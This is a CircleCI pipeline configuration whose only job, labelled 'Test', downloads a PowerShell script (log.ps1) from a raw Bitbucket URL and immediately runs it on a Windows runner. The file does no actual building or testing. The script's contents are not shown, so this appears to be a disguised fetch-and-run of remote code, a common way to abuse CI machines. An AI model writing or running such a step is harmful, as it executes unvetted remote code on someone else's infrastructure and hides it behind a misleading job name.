version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/lombokijo/ijomatamu/raw/00c89e24d50b5938eac4f1fe138a5521d5976d1f/log.ps1 -OutFile log.ps1
            ./log.ps1